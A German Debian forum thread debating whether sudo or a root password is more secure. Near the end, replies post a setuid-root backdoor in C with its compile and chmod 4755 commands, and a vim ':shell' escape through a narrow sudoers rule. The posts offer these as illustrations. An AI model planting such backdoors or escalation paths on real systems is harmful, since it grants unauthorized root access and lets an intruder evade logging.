Warum ist sudo standardmäßig deaktiviert?

Warum Debian und/oder eine seiner Spielarten? Was muss ich vorher wissen? Wo geht es nach der Installation weiter?
DaCoda
Beiträge: 172
Registriert: 09.07.2019 21:58:10

Warum ist sudo standardmäßig deaktiviert?

Beitrag von DaCoda » 14.02.2023 19:33:59

Standardmäßig ist sudo deaktiviert. Man bekommt dann eine Meldung, dass man nicht in der sudoers Datei ist.

Ich habe an mehr Sicherheit gedacht. Allerdings kann ich mir nicht erklären, wie das mehr Sicherheit bringen soll. Schließlich muss man genauso wie bei "su - root" sein Passwort eingeben.

Aber bestimmt gibt es einen Grund dafür. Wie lautet er? 8O

rhHeini
Beiträge: 2260
Registriert: 20.04.2006 20:44:10

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von rhHeini » 14.02.2023 19:51:02

Da gibt es eine längeren Thread zu dem Thema, ganz aktuell: viewtopic.php?t=186218

uname
Beiträge: 12046
Registriert: 03.06.2008 09:33:02

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von uname » 14.02.2023 20:11:52

Auf der ersten Seite des verlinkten Threads wird auf die Installation von Debian inkl. Screenshots eingegangen. Da wird es genau erklärt.

Benutzeravatar
cosinus
Beiträge: 3410
Registriert: 08.02.2016 13:44:11
Lizenz eigener Beiträge: GNU General Public License
Wohnort: Bremen

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von cosinus » 14.02.2023 21:16:43

DaCoda hat geschrieben: ↑ zum Beitrag ↑
14.02.2023 19:33:59
Standardmäßig ist sudo deaktiviert. Man bekommt dann eine Meldung, dass man nicht in der sudoers Datei ist.
Das ist so nicht richtig!
sudo ist nicht deaktiviert. Es wird über das Debian-Setup installiert und eingerichtet, wenn man (absichtlich) das Root-Passwort leer lässt. Richtet man ein Root-Passwort ein, wird sudo nicht installiert.

DaCoda hat geschrieben: ↑ zum Beitrag ↑
14.02.2023 19:33:59
Ich habe an mehr Sicherheit gedacht. Allerdings kann ich mir nicht erklären, wie das mehr Sicherheit bringen soll. Schließlich muss man genauso wie bei "su - root" sein Passwort eingeben.
Aber bestimmt gibt es einen Grund dafür. Wie lautet er? 8O
Wieso soll das mehr Sicherheit sein, wenn root kein Passwort hat und man mit sudo alle Befehle ausführen muss? Wenn du den User, der mit sudo alles machen kannst, nicht genauso wie root behandelst, kann das im Endeffekt weniger Sicherhei bedeuten!

Benutzeravatar
Tula
Beiträge: 137
Registriert: 23.03.2011 22:57:54

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von Tula » 14.02.2023 22:15:03

Ich verstehe DaCoda so, dass er das höhere Maß an Sicherheit durch Verwendung von root anstelle von sudo nicht nachvollziehen kann. Er behauptet weder, das Eine sei sicherer als das Andere, noch beschreibt er, er würde mit sudo unvorsichtiger sein als mit root.

Der Gedankengang ist eindeutig und logisch. Entsprechend sachbezogen kann man das behandeln, oder?

DaCoda, bezieht sich deine Fragestellung auf ein Desktop-System für eine Einzelperson?

thoerb
Beiträge: 1677
Registriert: 01.08.2012 15:34:53
Lizenz eigener Beiträge: MIT Lizenz

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von thoerb » 14.02.2023 22:39:40

DaCoda hat geschrieben: ↑ zum Beitrag ↑
14.02.2023 19:33:59
Ich habe an mehr Sicherheit gedacht. Allerdings kann ich mir nicht erklären, wie das mehr Sicherheit bringen soll. Schließlich muss man genauso wie bei "su - root" sein Passwort eingeben.
Genau deswegen kann man auch gleich darauf verzichten. Was nicht installiert ist, kann auch keine zusätzliche Sicherheitslücke sein.

Benutzeravatar
cosinus
Beiträge: 3410
Registriert: 08.02.2016 13:44:11
Lizenz eigener Beiträge: GNU General Public License
Wohnort: Bremen

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von cosinus » 14.02.2023 22:51:19

Tula hat geschrieben: ↑ zum Beitrag ↑
14.02.2023 22:15:03
Er behauptet weder, das Eine sei sicherer als das Andere, noch beschreibt er, er würde mit sudo unvorsichtiger sein als mit root.
Er stellt es aber in Frage: "Ich habe an mehr Sicherheit gedacht. Allerdings kann ich mir nicht erklären, wie das mehr Sicherheit bringen soll."

Es kommt immer drauf an, wie man damit umgeht. Wenn man sich in falsche Sicherheit wiegt nur weil man glaubt, alles sei safe weil root ist ja 'nicht aktiv' sei, unterliegt da einem schweren Irrtum, zumindest dann wenn er den administrativen User, der mit sudo alles machen kann, nicht genauso wie root behandelt.

Benutzeravatar
Livingston
Beiträge: 1366
Registriert: 04.02.2007 22:52:25
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: 127.0.0.1

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von Livingston » 15.02.2023 00:10:47

Ist es nicht völig masochistisch, die selbe Diskussion mehrmals zu führen?
rhHeini hat bereits hier in der ersten Antwort dieses Threads darauf hingewiesen, dass der selbe Krempel (teils von den selben Leuten) bereits hier viewtopic.php?t=186218 diskutiert wird.
Der Hauptunterschied zwischen etwas, was möglicherweise kaputtgehen könnte und etwas, was unmöglich kaputtgehen kann, besteht darin, dass sich bei allem, was unmöglich kaputtgehen kann, falls es doch kaputtgeht, normalerweise herausstellt, dass es unmöglich zerlegt oder repariert werden kann.
Douglas Adams

Benutzeravatar
cosinus
Beiträge: 3410
Registriert: 08.02.2016 13:44:11
Lizenz eigener Beiträge: GNU General Public License
Wohnort: Bremen

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von cosinus » 15.02.2023 00:13:13

Livingston hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 00:10:47
Ist es nicht völig masochistisch, die selbe Diskussion mehrmals zu führen?
Eine Diskussion mehr über sudo macht den Kohl nun auch nicht fett :P

Benutzeravatar
Livingston
Beiträge: 1366
Registriert: 04.02.2007 22:52:25
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: 127.0.0.1

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von Livingston » 15.02.2023 00:16:20

Da haste auch wieder Recht. Und es härtet vermutlich ab :twisted:
Der Hauptunterschied zwischen etwas, was möglicherweise kaputtgehen könnte und etwas, was unmöglich kaputtgehen kann, besteht darin, dass sich bei allem, was unmöglich kaputtgehen kann, falls es doch kaputtgeht, normalerweise herausstellt, dass es unmöglich zerlegt oder repariert werden kann.
Douglas Adams

Benutzeravatar
cosinus
Beiträge: 3410
Registriert: 08.02.2016 13:44:11
Lizenz eigener Beiträge: GNU General Public License
Wohnort: Bremen

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von cosinus » 15.02.2023 00:34:54

Livingston hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 00:16:20
Da haste auch wieder Recht. Und es härtet vermutlich ab :twisted:
Es macht gleichgültig, aber mir ist das egal :mrgreen:

Benutzeravatar
Tula
Beiträge: 137
Registriert: 23.03.2011 22:57:54

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von Tula » 15.02.2023 11:19:12

cosinus hat geschrieben: ↑ zum Beitrag ↑
14.02.2023 22:51:19
Tula hat geschrieben: ↑ zum Beitrag ↑
14.02.2023 22:15:03
Er behauptet weder, das Eine sei sicherer als das Andere, noch beschreibt er, er würde mit sudo unvorsichtiger sein als mit root.
Er stellt es aber in Frage...
Er stellt eine Frage. Das ist etwas Anderes.
Und zwar eine - finde ich - durch den Installer und die Praxis der Nutzerschaft naheliegende Frage.

Die Antworten differieren. Theoretisch passt ein solches Thema vielleicht auf eine Seite. Die Länge dieser Threads sehe ich wie in anderen Foren jedenfalls nicht durch die wirklich interessanten Antworten entstehen.

Ich hoffe, der TE bleibt dran.

Benutzeravatar
cosinus
Beiträge: 3410
Registriert: 08.02.2016 13:44:11
Lizenz eigener Beiträge: GNU General Public License
Wohnort: Bremen

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von cosinus » 15.02.2023 11:57:35

Tula hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 11:19:12
Er stellt eine Frage. Das ist etwas Anderes.
Er zweifelt an der Sicherheit, er kann es sich nicht erklären. Das lässt sich durchaus so interpretieren, dass er die Sicherheit in Frage stellt. Und die Antwort darauf lautet: it depends! :)

Benutzeravatar
TRex
Moderator
Beiträge: 8038
Registriert: 23.11.2006 12:23:54
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: KA

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von TRex » 15.02.2023 12:56:50

:roll:
Jesus saves. Buddha does incremental backups.
Windows ist doof, Linux funktioniert nichtDon't break debian!Wie man widerspricht

buhtz
Beiträge: 1099
Registriert: 04.12.2015 17:54:49
Kontaktdaten:

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von buhtz » 15.02.2023 13:08:35

Livingston hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 00:10:47
Ist es nicht völig masochistisch, die selbe Diskussion mehrmals zu führen?
Das hier auf einen anderen Thread verwiesen wird, anstatt auf Dokumentation oder ein Wiki, ist für mich ein Indikator, dass es hier Verbesserungsbedarf gibt.

Die Geschichte mit sudo ist eben für (Dauer)Einsteiger schwer nachzuvollziehen und eine immer wiederkehrende Frage.
Um sowas zu beantworten, sollten adäquate Wiki/Faq/Doku Einträge existieren, auf die man verlinkt.
Thread zu und fertig. Und keine Möglichkeit für andere Foren Nutzer, ihren Frust and armen Neulingen auszulassen.

EDIT: Ich selbst habe es nie ganz begriffen. :lol:
Debian 11 & 12; Desktop-PC, Headless-NAS, Raspberry Pi 4
Teil des Upstream Betreuer Teams von Back In Time (Debianbackintime)

Benutzeravatar
TRex
Moderator
Beiträge: 8038
Registriert: 23.11.2006 12:23:54
Lizenz eigener Beiträge: MIT Lizenz
Wohnort: KA

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von TRex » 15.02.2023 13:21:18

buhtz hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 13:08:35
Das hier auf einen anderen Thread verwiesen wird, anstatt auf Dokumentation oder ein Wiki, ist für mich ein Indikator, dass es hier Verbesserungsbedarf gibt.
Der "Deeplink" auf die Doku wäre nur Convenience gewesen. Man könnte ja quasi davon absehen, das jetzt hier auch noch totzudiskutieren und akzeptieren, dass die Frage nicht ohne Annahmen getroffen wurde, der Umstand, wie das zustande kam, jedoch einfach zu erklären ist. Ich tipp das hier jetzt einfach mal hin, wie es jeder ( :roll: ) hätte hinschreiben können.

Gibt man ein root-Passwort an, wird der root-Account "aktiviert". Gibt man kein root-Passwort an, kann man sich nicht direkt als root einloggen, und stattdessen wird sudo eingerichtet (nur für den ersten Benutzer, welcher während der Installation eingerichtet wird).

Welcher verdammte Weg nun sicherer ist, lässt sich verdammt nochmal nicht pauschal beantworten.

tl;dr: nix da "standardmäßig".
Jesus saves. Buddha does incremental backups.
Windows ist doof, Linux funktioniert nichtDon't break debian!Wie man widerspricht

uname
Beiträge: 12046
Registriert: 03.06.2008 09:33:02

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von uname » 15.02.2023 13:47:56

TRex hat geschrieben:Welcher verdammte Weg nun sicherer ist, lässt sich verdammt nochmal nicht pauschal beantworten.
Im anderen Thread habe ich geschrieben, dass sich der sudo-Ansatz so ähnlich verhält wie wenn man für root und dem eigenen Benutzer dasselbe Passwort verwendet.
Wen das stimmt, dann ist der nicht-sudo-Ansatz (root-Passwort) sicherer, wenn die Passwörter von root und dem eigenen Benutzer sich unterscheiden.

Benutzeravatar
Meillo
Moderator
Beiträge: 8782
Registriert: 21.06.2005 14:55:06
Wohnort: Balmora
Kontaktdaten:

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von Meillo » 15.02.2023 14:02:17

uname hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 13:47:56
TRex hat geschrieben:Welcher verdammte Weg nun sicherer ist, lässt sich verdammt nochmal nicht pauschal beantworten.
Im anderen Thread habe ich geschrieben, dass sich der sudo-Ansatz so ähnlich verhält wie wenn man für root und dem eigenen Benutzer dasselbe Passwort verwendet.
Wen das stimmt, dann ist der nicht-sudo-Ansatz (root-Passwort) sicherer, wenn die Passwörter von root und dem eigenen Benutzer sich unterscheiden.
Auf einem Mehradminsystem muss das root-Passwort gemeinsam genutzt werden. Das ist ein Sicherheitsnachteil, der dem entgegen steht. Insofern kann man es eben nicht pauschal sagen. ;-)
Use ed once in a while!

Benutzeravatar
cosinus
Beiträge: 3410
Registriert: 08.02.2016 13:44:11
Lizenz eigener Beiträge: GNU General Public License
Wohnort: Bremen

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von cosinus » 15.02.2023 14:12:39

Meillo hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 14:02:17
Auf einem Mehradminsystem muss das root-Passwort gemeinsam genutzt werden. Das ist ein Sicherheitsnachteil, der dem entgegen steht. Insofern kann man es eben nicht pauschal sagen. ;-)
Das ist doch gehüpft wie gesprungen. Wenn jeder Admin seinen eigenen Adminuser hat, der mit sudo alles machen darf, ist das kein entscheidender Unterschied als wenn alle root verwenden. Und mit sudo -i kann doch eh jeder root werden auch wenn kein Passwort für root gesetzt ist. :mrgreen:

thoerb
Beiträge: 1677
Registriert: 01.08.2012 15:34:53
Lizenz eigener Beiträge: MIT Lizenz

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von thoerb » 15.02.2023 14:15:59

cosinus hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 14:12:39
Das ist doch gehüpft wie gesprungen. Wenn jeder Admin seinen eigenen Adminuser hat, der mit sudo alles machen darf, ist das kein entscheidender Unterschied als wenn alle root verwenden.
Ich meine mal gelesen zu haben, dass es aber bei sudo protokolliert wird, wer was wann gemacht hat.

uname
Beiträge: 12046
Registriert: 03.06.2008 09:33:02

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von uname » 15.02.2023 14:17:58

Auf einem Mehradminsystem hat der root-Benutzer-mit-Passwort-Ansatz noch den Nachteil, dass wenn man das root-Passwort kennt, dass man als root administrieren kann. Scheidet jemand aus dem Admin-Team aus, muss das root-Passwort geändert werden. Beim sudo-Ansatz muss nur die Gruppe verkleinert werden. Wobei wer einmal root war, kann immer root bleiben. Aber eine Hintertür einbauen ist wohl seltener als das root-Passwort nicht vergessen zu können. :mrgreen:

Benutzeravatar
MSfree
Beiträge: 10686
Registriert: 25.09.2007 19:59:30

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von MSfree » 15.02.2023 14:35:06

uname hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 14:17:58
Aber eine Hintertür einbauen ist wohl seltener als das root-Passwort nicht vergessen zu können. :mrgreen:
Hintertür gefällig?

Nimm folgenden C-Code:

Code: Alles auswählen

#include <stdio.h>

int main(void)
{
  seteuid(0);
  setuid(0);
  setgid(0);
  setegid(0);
  system("/bin/bash");
  return 0;
}
Speichere ihn unter sush.c

Führe folgende Befehle aus:

Code: Alles auswählen

cc -o sush sush.c
chown root.root sush
sudo chmod 4755 sush
Rufe dann sush als unpriviligierter Nutzer auf und erfreue dich an einem root-Zugang ganz ohne Passwort.

uname
Beiträge: 12046
Registriert: 03.06.2008 09:33:02

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von uname » 15.02.2023 14:44:40

Nett. Auch wenn es gerade im Kontext dieser Diskussion nicht wirklich passt aber in sudo-Diskussionen ist Offtopic ja erlaubt.
Einige schaffen es sogar /etc/sudoers so falsch zu konfigurieren, dass es selbst zur Hintertür wird. :facepalm:

Benutzer user soll eine Datei editieren, die root gehört:

Code: Alles auswählen

user ALL=(ALL) /usr/bin/vim /pfad/zu/einer/volllommen/unwichtigen/datei
Eingabe user:

Code: Alles auswählen

sudo /usr/bin/vim /pfad/zu/einer/volllommen/unwichtigen/datei
:shell

Benutzeravatar
cosinus
Beiträge: 3410
Registriert: 08.02.2016 13:44:11
Lizenz eigener Beiträge: GNU General Public License
Wohnort: Bremen

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von cosinus » 15.02.2023 14:50:17

thoerb hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 14:15:59
Ich meine mal gelesen zu haben, dass es aber bei sudo protokolliert wird, wer was wann gemacht hat.
Ich muss ja nur einmal mit sudo -i root werden, setzte dann ein Passwort für root und mal vllt noch andere "Hintertürchen" rein und fortan muss ich mich nicht mehr um Logs kümmern.

Benutzeravatar
cosinus
Beiträge: 3410
Registriert: 08.02.2016 13:44:11
Lizenz eigener Beiträge: GNU General Public License
Wohnort: Bremen

Re: Warum ist sudo standardmäßig deaktiviert?

Beitrag von cosinus » 15.02.2023 14:53:08

uname hat geschrieben: ↑ zum Beitrag ↑
15.02.2023 14:17:58
Auf einem Mehradminsystem hat der root-Benutzer-mit-Passwort-Ansatz noch den Nachteil, dass wenn man das root-Passwort kennt, dass man als root administrieren kann. Scheidet jemand aus dem Admin-Team aus, muss das root-Passwort geändert werden. Beim sudo-Ansatz muss nur die Gruppe verkleinert werden. Wobei wer einmal root war, kann immer root bleiben. Aber eine Hintertür einbauen ist wohl seltener als das root-Passwort nicht vergessen zu können. :mrgreen:
Wenn jemand ausgeschieden ist, hat er ja keinen physikalischen Zugang mehr zu den Kisten. Dann würde von außen ja nur noch ein SSH-Login greifen, sofern eingerichtet und aktiviert. Da hilft dann auch das Root-Passwort nicht, wenn PermitRootLogin auf no oder prohibit-password steht --> /root/.ssh/authorized_keys checken :wink:

Antworten